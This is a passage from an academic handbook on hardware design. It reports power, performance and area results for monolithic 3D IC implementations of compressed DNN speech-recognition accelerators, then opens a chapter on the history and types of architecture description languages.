when the size of the matrix increases, and hardware for computing FFT and inverse
fast Fourier transform (IFFT) is required. The issue of matrix size is resolved in
Liao et al. (2017) using block-circulant matrices, but the advantage of using FFT
and IFFT to compute matrix vector multiplications is lost if the size of the blocks
reduces significantly. This restriction is not present if CGS is used.
GPU-accelerated DNN computations can also benefit from CGS. With CGS,
along with the testing inference, training complexity can also be reduced due to
the sparse nature of the weight matrices. The structured sparsity allows writing customized GPU kernels that operate only on the non-zero elements, significantly speeding up training and reducing GPU power consumption, as shown in Gray et al. (2017).
In order to study the impact of M3D ICs on the power, performance, and area
of different DNN architectures, the block sizes are swept for the compression ratio
of 87.5%, and the two DNN architectures that have the two lowest phoneme error
rates (PER) for the TIMIT dataset are selected for hardware implementation. The
two architectures chosen are the DNN with 16 × 16 block size (DNN CGS-16) and
the DNN with 64 × 64 block size (DNN CGS-64), as shown in Table 13.
Fig. 33 Block diagram of the CGS-based DNN architecture for speech recognition
Fig. 34 GDS layouts of the implemented DNN CGS-16 and CGS-64 architectures at 400 MHz target clock frequency. DNN CGS-16: (a) 2D IC, (b) M3D-both, (c) M3D-one; DNN CGS-64: (d) 2D IC, (e) M3D-both, (f) M3D-one
Table 14 Iso-performance (400 MHz) design metric comparison of 2D and M3D ICs of DNN
CGS-16 and CGS-64 architectures. All percentage values show the reduction from their 2D
counterparts
Parameter 2D M3D-both % M3D-one %
DNN CGS-16
Footprint (μm) 1411 × 1411 1010 × 984 −50.1% 996 × 1322 −33.9%
Wire-length (m) 12.089 8.469 −29.9% 12.225 1.1%
Cell count 298,309 262,084 −12.1% 290,692 −2.6%
Cell area (mm2 ) 0.505 0.431 −14.6% 0.511 1.1%
Mem area (mm2 ) 1.287 1.287 0.0% 1.287 0.0%
MIV count – 77,536 1776
Pin cap (pF) 943.3 788.0 −16.5% 1004.1 6.4%
Wire cap (pF) 2216.8 1440.8 −35.0% 2087.4 −5.8%
Total cap (pF) 3160.1 2228.7 −29.5% 3091.6 −2.2%
DNN CGS-64
Footprint (μm) 1411 × 1411 1010 × 984 −50.1% 996 × 1322 −33.9%
Wire-length (m) 5.631 3.734 −33.7% 7.134 26.7%
Cell count 163,361 149,921 −8.2% 174,292 6.7%
Cell area (mm2 ) 0.314 0.269 −14.3% 0.328 4.7%
Mem area (mm2 ) 1.287 1.287 0.0% 1.287 0.0%
MIV count – 48,636 1776
Pin cap (pF) 520.8 390.8 −25.0% 553.5 6.3%
Wire cap (pF) 920.1 573.7 −37.7% 1110.5 20.7%
Total cap (pF) 1440.9 964.4 −33.1% 1664.0 15.5%
The M3D-both designs achieve a 50.1% footprint reduction compared with the 2D ICs, whereas the M3D-one designs obtain only a 33.9% reduction. This difference is attributed to the large memory area relative to logic in the DNN CGS-16 2D IC. These large memory blocks, if placed in the same tier, cause the footprint to increase significantly.
The wire-length saving reaches 29.9% and 33.7% in CGS-16 and CGS-64,
respectively, with the M3D-both designs. This significant wire-length saving comes
from the 50% smaller footprint and shorter distance among cells in M3D ICs. The
M3D-both design for CGS-16 architecture achieves 12.1% cell count reduction,
which leads to 14.6% total cell area saving. This saving mainly comes from fewer
buffers and smaller gates needed to close timing in M3D ICs compared with the 2D
counterparts. The savings in CGS-64 architecture are 8.2% and 14.3% for the cell
count and area, respectively.
In the CGS-16 architecture, 77 K MIVs are utilized, while 48 K MIVs are used in CGS-64. This is mainly because the CGS-16 design is more complex than CGS-64 (discussed further below), so the tier partitioning cutline cuts through more inter-tier connections in CGS-16. In the M3D-one design, logic and memory are separated into different tiers. The logic-memory connectivity is not high in the DNN architecture (= 1.7 K).
Fig. 35 Cell placement of the modules in CGS-16 architecture. (a) 2D, (b) M3D-both, (c) M3D-
one. Each module is highlighted with different colors
In the CGS-16 architecture, the 16.5% pin capacitance saving comes from the cell area reduction, while the 35.0% wire capacitance saving comes from the wire-length reduction. The raw data show that the DNN architecture is wire-dominated. The pin and wire capacitance savings reach 25.0% and 37.7% in CGS-64.
To better understand why M3D-one gives significantly worse results than M3D-
both, a placement comparison among 2D, M3D-both, and M3D-one designs is
shown in Fig. 35. In the M3D-both design shown in Fig. 35b, the logic cells related
to memory blocks in the top tier are placed in the same tier as the memory and
densely packed to reduce wire-length effectively. This is the same for the bottom
tier in the M3D-both design. On the other hand, logic gates are rather spread out
across the top tier in the M3D-one design shown in Fig. 35c. This results in 1.1%
increase in wire-length for CGS-16 and 26.7% increase in wire-length for CGS-
64 compared with the 2D counterparts. This highlights the importance of footprint
management and tier partitioning in the presence of large memory modules in DNN
architectures.
Power Comparisons
Table 15 presents the iso-performance power comparison between 2D and M3D
ICs of CGS-based DNNs. Internal, net switching, and leakage power breakdown is
Table 15 Iso-performance (400 MHz) power metric comparison of two architectures (CGS-16
vs. CGS-64) using two workloads (classification vs. pseudo-training). All percentage values show
the reduction from their 2D counterparts
Workload Power breakdown 2D M3D-both % M3D-one %
DNN CGS-16
Classification Internal power (mW) 91.3 76.7 −16.0% 90.3 −1.1%
Net switching power (mW) 48.6 31.6 −35.0% 46.5 −4.3%
Leakage power (mW) 1.3 1.2 −6.6% 1.3 0.5%
Total power (mW) 141.1 109.6 −22.3% 138.0 −2.2%
Pseudo-training Internal power (mW) 150.4 142.8 −5.1% 148.3 −1.4%
Net switching power (mW) 68.4 57.1 −16.6% 65.6 −4.2%
Leakage power (mW) 1.3 1.2 −6.8% 1.3 0.7%
Total power (mW) 220.0 201.0 −8.6% 215.0 −2.3%
DNN CGS-64
Classification Internal power (mW) 86.8 76.1 −12.3% 84.9 −2.2%
Net switching power (mW) 41.2 30.2 −26.7% 42.8 3.9%
Leakage power (mW) 1.1 1.1 −4.7% 1.1 1.5%
Total power (mW) 129.1 107.3 −16.9% 128.8 −0.2%
Pseudo-training Internal power (mW) 129.2 120.0 −7.2% 128.5 −0.5%
Net switching power (mW) 46.0 36.3 −21.2% 50.3 9.3%
Leakage power (mW) 1.1 1.1 −4.6% 1.1 1.4%
Total power (mW) 176.3 157.4 −10.7% 179.9 2.0%
reported for each design. The sign-off power calculations are conducted using two
speech recognition workloads: classification and pseudo-training.
During classification, CGS-16 consumes 141.1 mW, while CGS-64 consumes 129.1 mW. This confirms that CGS-16 consumes more power to handle its more complex weight selection process. A similar trend is observed during pseudo-training.
Pseudo-training, as expected, causes more switching in the circuits and thus more
power consumption compared with classification for both CGS-16 and CGS-64
architectures.
Next, the power consumption of 2D and M3D ICs is compared. The resulting
footprint of M3D-both designs is reduced by half, thereby reducing the wire-length
between the cells. Figure 36a shows the wire-length distribution of the 2D and M3D
ICs of the CGS-16 architecture. The histogram clearly shows that the M3D ICs contain a larger number of short wires and fewer long wires compared with the 2D IC. The wire-length saving translates into a reduction of the wire capacitance Cwire in Eq. 1, and therefore a saving in the third term of the equation.
Figure 36b presents the distribution of standard cells across ranges of cell drive-strength. The M3D-both design uses a larger number of low drive-strength cells (i.e., ×0 ∼ ×0.8) and fewer high drive-strength cells (i.e., ×1 ∼ ×16). Since low drive-strength cells utilize smaller transistors, the short-circuit current of the transistors and Cpin are lower, which reduces both the first and second terms in Eq. 1.
Fig. 36 (a) Wire-length and (b) cell drive-strength distribution of DNN CGS-16 2D, M3D-both,
and M3D-one
Fig. 37 GDS layouts of 2D and M3D ICs of DNN CGS-16 and CGS-64 architectures at the
maximum target frequencies. (a) 2D IC at 550 MHz, (b) M3D IC at 575 MHz of DNN CGS-16
architecture, (c) 2D IC at 600 MHz, (d) M3D IC at 625 MHz of DNN CGS-64 architecture
Table 16 reports the target clock frequency, the worst negative slack (WNS) from timing analysis, and the effective clock frequency, which is the maximum achievable clock frequency at which the designs can operate without timing violations. Comparing only the 2D ICs of the CGS-16 and CGS-64 architectures, the effective clock frequency of the CGS-16 2D IC is 11.1% less than that of the CGS-64 2D IC. As the critical path of the CGS-16 2D IC runs from the weight SRAM to the MAC unit through the weight selection logic, the lower effective clock frequency of the CGS-16 2D IC is attributed to its more complex weight selection logic, reflected in the higher design density of Fig. 37a compared to Fig. 37c.
Next, the maximum performance of the 2D and M3D ICs is compared. The M3D ICs show 6.2% and 1.2% performance improvement over their 2D counterparts in the CGS-16 and CGS-64 architectures, respectively. To analyze this trend, the worst timing paths of the 2D and M3D ICs are compared. Figure 38 compares the same timing path (i.e., the worst timing path of the 2D IC) in the 2D and M3D CGS-16 designs at the maximum target clock frequency of the 2D IC, and Table 17 presents key metrics of the timing path.
The wire-length of the worst timing path of the 2D IC is 53.6% longer than the
same timing path in the M3D IC. This is attributed to the reduced footprint and the
Table 16 Maximum performance comparison of 2D and M3D ICs of DNN CGS-16 and CGS-64
architectures
Parameter DNN CGS-16 DNN CGS-64
2D Target clk freq (MHz) 550 600
WNS (ns) −0.056 0.002
Effective clk freq (MHz) 534 601
M3D Target clk freq (MHz) 575 625
WNS (ns) −0.024 −0.046
Effective clk freq (MHz) 567 608
% effective clk freq 6.2% 1.2%
Fig. 38 Worst timing path comparison of 2D and M3D ICs of DNN CGS-16 architecture. (a) The
worst timing path of 2D IC at its maximum target clock frequency, 550 MHz. (b) The same timing
path in M3D IC
inter-tier connections of the M3D IC, which result in shorter distances among the cells along the timing path. The M3D IC offers 24.6% cell count saving as well as 21.3% average cell drive-strength reduction, thereby reducing the cell area of the timing path by 63.1%. This is because fewer and smaller buffers are needed to drive the reduced wire-load that results from the wire-length reduction.
Compared to the 2D IC, the wire and pin capacitance of the timing path in
the M3D IC are reduced by 51.6% and 35.8%, respectively. The wire capacitance
reduction mainly comes from the wire-length reduction of the timing path, whereas
the pin capacitance saving results from the cell count and cell drive-strength
reduction. In addition, the M3D IC achieves 35.9% resistance reduction in the
timing path. The resistance saving is also attributed to the wire-length saving along
the timing path.
Due to the capacitance and resistance savings along the worst timing path, the delay of the timing path is reduced by 10.9% in the M3D IC, thereby offering room to improve performance.
In order to understand the impact of the above observations to the overall timing
paths of the 2D and M3D ICs, the slack distribution of all timing paths of the 2D
and M3D CGS-16 designs is reported in Fig. 39. While 18 timing paths of the 2D
IC violate the timing constraints, the M3D IC successfully closes timing without
any violation. In addition, there are more timing paths with high positive slack in
the M3D IC, which indicates that timing is easily closed in the M3D IC due to the
reduced delay of the timing paths.
The difference in the performance improvement of the M3D ICs of the CGS-16 and CGS-64 architectures is discussed in detail in the next section.
Fig. 39 Slack distribution comparison between 2D and M3D ICs of DNN CGS-16 architecture at
the maximum clock frequency of the M3D IC
Fig. 40 Standard cell area breakdown of 2D CGS-16 and CGS-64 architectures. Non-dashed
and dashed boxes, respectively, indicate combinational and sequential elements. Only five largest
modules are shown
algorithm). The 1024 × 1024 weight matrix is divided into 256 (= 16 × 16) weight
blocks in CGS-64 architecture. This count becomes 4096 (= 64 × 64) weight
blocks in CGS-16. The implication in DNN architecture is that CGS-16 requires a
more complex neuron selection unit than CGS-64. Figure 40 shows the comparison
of standard cell area of each module in CGS-16 and CGS-64 architectures. Both
sequential (dashed box) and combinational logic (non-dashed box) portion in each
module are shown. The neuron selection unit in CGS-16 architecture (shown in
purple) occupies more area than that in CGS-64 architecture.
As discussed before, M3D ICs benefit not only from wire-length reduction
but also from standard cell area saving. The number of storage elements (i.e.,
sequential logic and memory blocks) used in 2D and M3D ICs remains the same.
Thus, the only possible power reduction coming from storage elements is their
drive-strength reduction. This does not have a huge impact considering the small portion of sequential elements in the DNN architectures (16.1% on average). On the other hand, combinational logic can be optimized in various ways, such as logic restructuring and buffer reduction. Therefore, the DNN M3D ICs benefit more from combinational logic gates than from sequential elements.
Fig. 41 Power breakdown under two DNN architectures (CGS-16 and CGS-64), two workloads (classification and pseudo-training), and two designs (2D and M3D ICs)
Figure 41 shows the breakdown of total power consumption into combina-
tional, register, clock, and memory portions. Combinational power reduction is the
dominant factor in total power saving of M3D ICs in both CGS-16 and CGS-64
architectures and in both classification and pseudo-training workloads. The saving
in other parts including register, clock, and memory power largely remains small.
In addition, the neuron selection unit in CGS-16 architecture consists of a larger
number of combinational logic gates than CGS-64. Thus, its M3D ICs have more
room for power optimization, resulting in a larger combinational power saving.
The larger neuron selection logic in CGS-16 architecture also offers more
opportunity to improve the performance of M3D ICs. While 2D ICs suffer long
timing path due to the complex neuron selection logic, M3D ICs effectively reduce
the wire-length, providing buffer count/size reduction along the worst timing path.
This reduces the capacitance and resistance of timing paths, thereby offering shorter
delay and larger performance improvement.
Figure 42 compares the total wire-length and standard cell count along the
selected 486 timing paths, which are from weight SRAMs to registers of MAC
units through neuron selection logic, in the 2D/M3D CGS-16/CGS-64 designs at
the maximum frequency of the 2D ICs. Comparing only the 2D ICs, the CGS-16 2D IC clearly utilizes longer wire-length as well as more standard cells because its neuron selection logic is more complex. As the CGS-16 M3D IC has more combinational logic to optimize within the reduced footprint, it offers more cell count and wire-length reduction compared to the CGS-64 M3D IC, providing more room for performance improvement at higher clock frequencies.
Fig. 42 Comparison of (a) the wire-length and (b) cell count of the timing paths from weight SRAMs to registers in MAC units through neuron selection logic in the 2D and M3D-both designs of the DNN CGS-16 and CGS-64 architectures
Impact of Workloads
In order to investigate the impact of different DNN workloads on M3D power
saving, two main types of speech recognition DNN workloads are analyzed:
feed-forward classification and training. Real-world test vectors are used for feed-
forward classification. However, since the current architecture does not support online training (to avoid the computational overhead of computing gradients during DNN training), customized test vectors are created for "pseudo-training." Online training of a DNN consists of feed-forward computation and backward computation. In order
to mimic the online training on the current architecture, there are two phases in
the pseudo-training test vectors as shown in Fig. 43. In the first phase, the DNN
performs feed-forward classification, which represents feed-forward computation
during training. In the second phase, the DNN conducts feed-forward classification
and writes the weights to memory blocks, which represents backward computation
and weight update. These two phases mimic the behavior of logic computation and
weight update during training.
Table 15 shows that while M3D-both shows 22.3% (CGS-16) and 16.9% (CGS-
64) total power reduction in feed-forward classification workload, the power saving
of pseudo-training workload is only 8.6% (CGS-16) and 10.7% (CGS-64). This
difference stems from different switching patterns of combinational logic and
storage elements in the DNN architecture. The DNN mainly uses combinational
logic gates to compute the values of neuron outputs and access memory for read
operations only during feed-forward classification. Thus, this workload is classified
as a compute-intensive kernel. On the other hand, memory operations are heavily
used during pseudo-training since the DNN architecture needs to read and write weights. This makes it a memory-intensive kernel. Therefore, switching activity in memory blocks is much higher during pseudo-training, while that of combinational logic remains largely similar. This explains the larger power consumption during the pseudo-training workload: 220.0 mW vs. 141.1 mW for CGS-16 and 176.3 mW vs. 129.1 mW for CGS-64, as shown in Table 15.
Fig. 43 Comparison of the operations in (a) the feed-forward classification and (b) pseudo-training
As shown in Fig. 41, memory power and register power occupy a large portion
of the total power during pseudo-training. This means that the combinational logic
power saving becomes a smaller portion of the total power saving during training.
The opposite is true for classification, where memory and register power are less dominant. In this case, the combinational power saving becomes more prominent in the total power saving.
Conclusion
References
Arden W, Brillouët M, Cogez P et al (2012) More-than-Moore: a white paper. In: IEEE international roadmap for devices and systems, p 31
Batude P, Fenouillet-Beranger C, Pasini L et al (2015) 3DVLSI with CoolCube process: an alternative path to scaling. In: Proc. symp. on VLSI technology, 2015
Billoint O, Sarhan H, Rayane I et al (2015) A comprehensive study of monolithic 3D cell on cell
design using commercial 2D tool. In: Proc. design, automation and test in Europe, 2015
Bozorgzadeh B, Afzali-Kusha A (2008) Decoupling capacitor optimization for nanotechnology
designs. In: Proc. int. conf. on microelectronics, 2008
Chang K, Acharya K, Sinha S et al (2017) Impact and design guideline of monolithic 3-D IC at the 7-nm technology node. IEEE Trans VLSI Syst 25:2118–2129
Cheng Y, Yu FX, Feris RS et al (2015) An exploration of parameter redundancy in deep networks with circulant projections. arXiv:1502.03436 [cs], February 2015
Cheng Y, Wang D, Zhou P (2017) A survey of model compression and acceleration for deep neural
networks. arXiv:1710.09282 [cs], October 2017
Conneau A, Kiela D, Schwenk H et al (2017) Supervised learning of universal sentence
representations from natural language inference data. arXiv:1705.02364 [cs], May 2017
Courbariaux M, Bengio Y, David J-P (2015) BinaryConnect: training deep neural networks with binary weights during propagations. arXiv:1511.00363 [cs], November 2015
Courbariaux M, Hubara I, Soudry D (2016) Binarized neural networks: training deep neural
networks with weights and activations constrained to +1 or −1. arXiv:1602.02830 [cs],
February 2016
Das S, Whatmough P, Bull D (2015) Modeling and characterization of the system-level power
delivery network for a dual-core ARM Cortex-A57 cluster in 28 nm CMOS. In: Proc. int. symp.
on low power electronics and design, 2015
Deng L, Hinton G, Kingsbury B (2013) New types of deep neural network learning for speech
recognition and related applications: an overview. In: Proc. int. conf. on acoustics, speech and
signal processing, 2013
Gardner WA (1984) Learning characteristics of stochastic-gradient-descent algorithms: a general
study, analysis, and critique. Signal Process 6:113–133
Garofolo JS, Lamel LF, Fisher WM et al (1993) DARPA TIMIT acoustic-phonetic continuous
speech corpus CD-ROM. NIST Speech Disc 1-1.1, NASA STI/Recon technical report N,
vol. 93, February 1993
Graves A, Mohamed A-r, Hinton G (2013) Speech recognition with deep recurrent neural
networks. arXiv:1303.5778 [cs], March 2013
Gray S, Radford A, Kingma DP (2017) GPU kernels for block-sparse weights
Han S, Mao H, Dally WJ (2015) Deep compression: compressing deep neural networks with
pruning, trained quantization and huffman coding. arXiv:1510.00149 [cs], October 2015
Han S, Kang J, Mao H et al (2016) ESE: efficient speech recognition engine with sparse LSTM on
FPGA. arXiv:1612.00694 [cs], December 2016
He T, Fan Y, Qian Y et al (2014) Reshaping deep neural network for fast decoding by node-pruning.
In: Proc. int. conf. on acoustics, speech and signal processing, 2014
He K, Zhang X, Ren S et al (2015) Deep residual learning for image recognition. arXiv:1512.03385
[cs], December 2015
Kadetotad D, Arunachalam S, Chakrabarti C et al (2016) Efficient memory compression in deep
neural networks using coarse-grain sparsification for speech applications. In: Proc. int. conf. on
computer-aided design
Karpathy A, Fei-Fei L (2017) Deep visual-semantic alignments for generating image descriptions.
IEEE Trans Pattern Anal Machine Intell 39:664–676
Khan NH, Alam SM, Hassoun S (2011) Power delivery design for 3-D ICs using different through-silicon via (TSV) technologies. IEEE Trans VLSI Syst 19:647–658
Krizhevsky A, Sutskever I, Hinton GE (2012) ImageNet classification with deep convolutional
neural networks. In: Proc. int. conf. on neural information processing systems, 2012
Larsson P (1998) Resonance and damping in CMOS circuits with on-chip decoupling capacitance. IEEE Trans Circuits Syst 45:849–858
Liao W, He L, Lepak KM (2005) Temperature and supply voltage aware performance and power
modeling at microarchitecture level. IEEE Trans Comput-Aided Design Integr Circuits Syst
24:1042–1053
Liao S, Li Z, Lin X et al (2017) Energy-efficient, high-performance, highly-compressed deep
neural network design using block-circulant matrices. In: Proceedings of IEEE international
conference on computer aided design
Okada M, Sugaya I, Mitsuishi H et al (2014) High-precision wafer-level Cu-Cu bonding for 3DICs.
In: Proc. int. electron devices meeting, 2014
Pant S, Chiprout E (2006) Power grid physics and implications for CAD. In: Proc. design
automation conf. 2006
Panth SA, Samadi K, Du Y, Lim SK (2014) Design and CAD methodologies for low power
gate-level monolithic 3D ICs. In: IEEE international symposium on low power electronics and
design, 2014
Povey D, Ghoshal A, Boulianne G et al (2011) The Kaldi speech recognition toolkit. In: IEEE workshop on automatic speech recognition and understanding, January 2011
Seo KI, Haran B, Gupta D et al (2014) A 10nm platform technology for low power and high
performance application featuring FINFET devices with multi workfunction gate stack on bulk
and SOI. In: Proc. symp. on VLSI technology, 2014
Song T, Rim W, Jung J et al (2015) A 14 nm FinFET 128 Mb SRAM with VMIN enhancement techniques for low-power applications. IEEE J Solid-State Circuits 50:158–169
Su D, Wu X, Xu L (2010) GMM-HMM acoustic model training by a two-level procedure with Gaussian components determined by automatic model selection. In: Proc. int. conf. on acoustics, speech and signal processing
Sze V, Chen Y-H, Emer J et al (2017) Hardware for machine learning: challenges and opportunities.
arXiv:1612.07625 [cs], April 2017
Wu SY, Lin CY, Chiang MC et al (2013) A 16 nm FinFET CMOS technology for mobile SoC and
computing applications. In: Proc. int. electron devices meeting, 2013
Xiong W, Droppo J, Huang X et al (2016) The Microsoft 2016 conversational speech recognition
system. arXiv:1609.03528 [cs], September 2016
Yang SH, Sheu JY, Ieong MK et al (2011) 28nm metal-gate high-K CMOS SoC technology for
high-performance mobile applications. In: Proc. custom integrated circuits conf., 2011
Part V
Processor Design and Programming Flows
23 Architecture Description Languages
Anupam Chattopadhyay, Zheng Wang, and Grant Edmund Martin
Contents
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 808
A Brief History of ADLs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 812
The Classical Era: 1990–2000 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 813
The First Industrial Era: 2000–2010 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 813
The Second Industrial Era: 2010–2020 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 814
Types and Characteristics of ADLs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 814
Types of ADLs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 814
Characteristics of ADLs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 815
Key ADLs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 816
MIMOLA . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 816
EXPRESSION . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 817
nML . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 817
LISA . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 818
PEAS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 819
TENSILICA TIE . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 819
ARC APEX . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 820
Codasip CodAL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 821
Andes ACE . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 822
RISC-V Chisel . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 822
A. Chattopadhyay
School of Computer Science and Engineering, Nanyang Technological University, Singapore,
Singapore
e-mail: [email protected]
Z. Wang
Shenzhen Institute of Advanced Technology, Chinese Academy of Sciences, Shenzhen, China
e-mail: [email protected]
G. E. Martin
Independent Consultant, Pleasanton, CA, USA
e-mail: [email protected]
Abstract
Keywords
Introduction
The development of electronics since the middle of the last century has been notable
for many advances in technology, but one in particular was described by Tsugio
Makimoto of Sony in Japan in 1991: Makimoto’s Wave (Makimoto 2002). In
this paper, Makimoto describes how the semiconductor industry has swung on a
cyclical basis between standardization and customization, in cycles lasting about
a decade. When one considers computing devices in the most general terms, from the mainframe computer through to the modern era of desktops, laptops, and servers as one pole, and the embedded computing devices found ubiquitously in appliances, phones, wearable devices, vehicles, and the "Internet of Things" (IoT) as the other, one can see very similar waves.
The earliest mainframe era, for example, featured many different types of
processors with their associated Instruction Set Architectures (ISAs) – so, a lot
of customization. But the IBM 360 ISA became dominant in the marketplace –
so was standardized in many uses. Minicomputers followed the same trend, with
a variety of vendors, but the DEC ISAs becoming dominant. The advent of
the microprocessor led to a wide variety of processor architectures and ISAs,
(customization), but two in particular became dominant: Intel’s x86 ISA, for
desktops, laptops, and servers, and ARM’s embedded processors for phones and
many other devices. Hence, customization was followed by standardization.
The design and verification of new processor ISAs in the earliest days required
large engineering teams. These included large hardware teams and also specialized
software teams to create the tools required to program and debug these proces-
sors. As ISAs swung from Complex Instruction Set Computers (CISCs) through
to generations of Reduced Instruction Set Computers (RISCs), the role of the
optimizing compiler grew ever more important so that programmers could develop
the increasing amount of application software required to allow the proliferation of
computing into all aspects of life (see Chap. 32, “Retargetable Compilation”).
The proliferation of programming languages at various levels of abstraction made the software tools crisis ever more pressing. The tools available
in both hardware and software domains in the early periods were primitive and
led in themselves to considerable research and development of electronic design
automation (EDA) tools for hardware design and verification and new programming
models, abstractions, and tools in the software domain.
All these computing devices use programmable components: processors, copro-
cessors, and relatively less-programmable components, such as in-memory com-
puting accelerators and Tensor Processing Units (TPUs). These programmable
components are also generally referred to as programmable accelerators. Figure 1
shows a typical embedded system with various programmable accelerators. In any
chosen application domain, the embedded system can have application-specific pro-
grammable accelerators, reconfigurable logic fabrics, general-purpose graphics pro-
cessing units, digital signal processors, image/audio/cryptographic co-processors,
specialized processors for Artificial Intelligence/Machine Learning (“AI/ML”)
computations, communication buses, and peripherals. The variety and complexity
of these programmable accelerators are increasing at a rapid pace due to the growing
demand for design of increasingly complex applications in smart healthcare, smart
infrastructure, ubiquitous communication, and in general applications driven by
growth of communication, sensing, and intelligence capabilities. This push for
complex programmable accelerator design is further made challenging due to
shrinking time-to-market as well as short product lifetimes. This calls for an efficient
and effective design automation flow for complex programmable accelerators (often
known as Application-Specific Instruction-set Processors, or ASIPs).
The most crucial roles in the design automation of ASIPs are played by
specification and modeling. It is imperative to develop a high-level and sufficiently
expressive specification language that can model the complex processors and their
ISAs. The specification language needs to enable automated design performance evaluation.
Fig. 1 A typical embedded system with programmable accelerators: a base processor with audio, image, and cryptographic co-processors, a digital signal processor, a GPGPU, reconfigurable logic, a DMA controller, a memory subsystem, and an analog-digital converter with sensors and actuators, connected via a network-on-chip
Fig. 2 An ADL-driven ASIP design flow: an architecture specification and an application profiler feed the ADL specification, from which an automatic toolflow supports design space exploration and evaluation (runtime, frequency, area, reliability, functionality)
A Brief History of ADLs
The history of ADLs can be divided into three eras, each approximately a decade in length. These are:
• The Classical Era: 1990–2000
• The First Industrial Era: 2000–2010
• The Second Industrial Era: 2010–2020
changes. There were also significant arrivals of new ADLs from new commercial
providers, triggered in part by the RISC-V movement. Except for RISC-V, which
arose in academia, most of the academic interest in ADL research declined.
The growth in RISC-V architectures also coincides with a range of serious vulnerabilities identified in commercial processors. Thus, RISC-V architectures and their associated design flows consider security as a fundamental design objective (Watson et al. 2019).
In addition to the brief descriptions of ADLs in this chapter, the reader might
look to several comprehensive ADL surveys available in the literature including
ADLs for retargetable compilation (Qin and Malik 2002), programmable embedded
systems (Mishra and Dutt 2005b), and SoC design (Tomiyama et al. 1999). A
definitive compilation of the ADLs can be found in references (Leupers et al. 2016;
Mishra and Dutt 2008).
The Classical Era: 1990–2000
In the classical era, there were notable academic research results developed in ADLs and tool flows. Motivations included a desire to raise EDA abstraction levels to better automate processor design. Thus, there is a natural basis in the ADL work to evolve from RTL abstractions and to focus more on hardware
generation. Examples of early research ADLs are MIMOLA, EXPRESSION, nML,
LISA, and PEAS, which are described below.
The First Industrial Era: 2000–2010
This era saw two major developments: a transition from academic research to industrial application for some ADLs such as LISA and nML, and the development within industry of ADL-based ASIP design tools such as Tensilica TIE and ARC APEX.
The industrial history, based both on within-industry developments and academic transfers, can be complex and hard to follow. nML, for example, was commercialized by Target Compiler Technologies in 1996, which was later purchased by Synopsys in 2014.
LISA spun out of the Institute for Integrated Signal Processing Systems (ISS) of
RWTH Aachen as a company, LISATek, in 2001. LISATek was then bought by
CoWare in 2003; CoWare itself was acquired by Synopsys in 2010.
ARC Cores spun out of Argonaut Games and one of its successor companies,
Argonaut Technologies, Limited, in 1996 as a commercial company and was
acquired by Virage Logic in 2009. Virage Logic was acquired by Synopsys in
2010; thus, by 2014, Synopsys had three ADL-based technologies: nML (Target
Compilers), LISA (LISATek), and ARC APEX (ARC/Virage).
The Second Industrial Era: 2010–2020
In this phase of ADL evolution, there have been some new ADLs emerging from
industry. However, these did not divert much from the basic ADL semantics already
established by the first- and second-generation ADLs.
During the second industrial era, Tensilica, which had started in 1997, was
acquired by Cadence in 2013, and the decade saw further development of Tensilica
configurable, extensible processor technology under the Xtensa name, including its
ADL TIE. Synopsys, which by 2010 had two ADL-based technologies and added
nML by 2014, continued to develop ARC APEX as part of its ARC offering. It
also merged aspects of its ASIP technologies into a more unified tool called ASIP
Designer (Synopsys ASIP Designer), which is the current home of nML within
Synopsys today.
Because the fundamental ADL research had been done during the first and
second generation of research and development, interest in ADL-based research
in academia declined considerably during the second industrial era. Most academic
interest lay in using ADLs to create interesting applications, as will be seen later.
Types and Characteristics of ADLs

Types of ADLs
Looking at ADLs in 2022, one can distinguish two basic types of ADLs: complete
and ISA extension.
Complete ADLs allow the designer to capture all aspects of a processor and
its ISA: all processor resources and properties and all aspects of the complete
ISA including all basic scalar operations and all operation extensions including
vector/SIMD operations and their associated resources and properties. A tool flow
supporting a complete ADL will compile it into all relevant derivative design files
needed to support the HW implementation, SW creation, and the HW-SW interface.
The net result is an ASIP designed from the ground up. Examples of complete ADLs
include MIMOLA, nML, EXPRESSION, and LISA.
ISA extension ADLs are intended to allow designers to extend a configurable,
extensible processor by adding new operations/instructions to a basic core ISA.
Somewhat ironically, the core ISA itself may also be partially captured using the
ADL, but there is usually a “hard core” part of the ISA captured in configurable
RTL and supported deeply within the SW tools. The extension ISA adds relevant
resources, properties, and behavioral and structural descriptions of the additional
instruction extensions, and these are compiled by the tool flow into additional HW
implementations and SW tool properties that add to the basic hard core ISA support
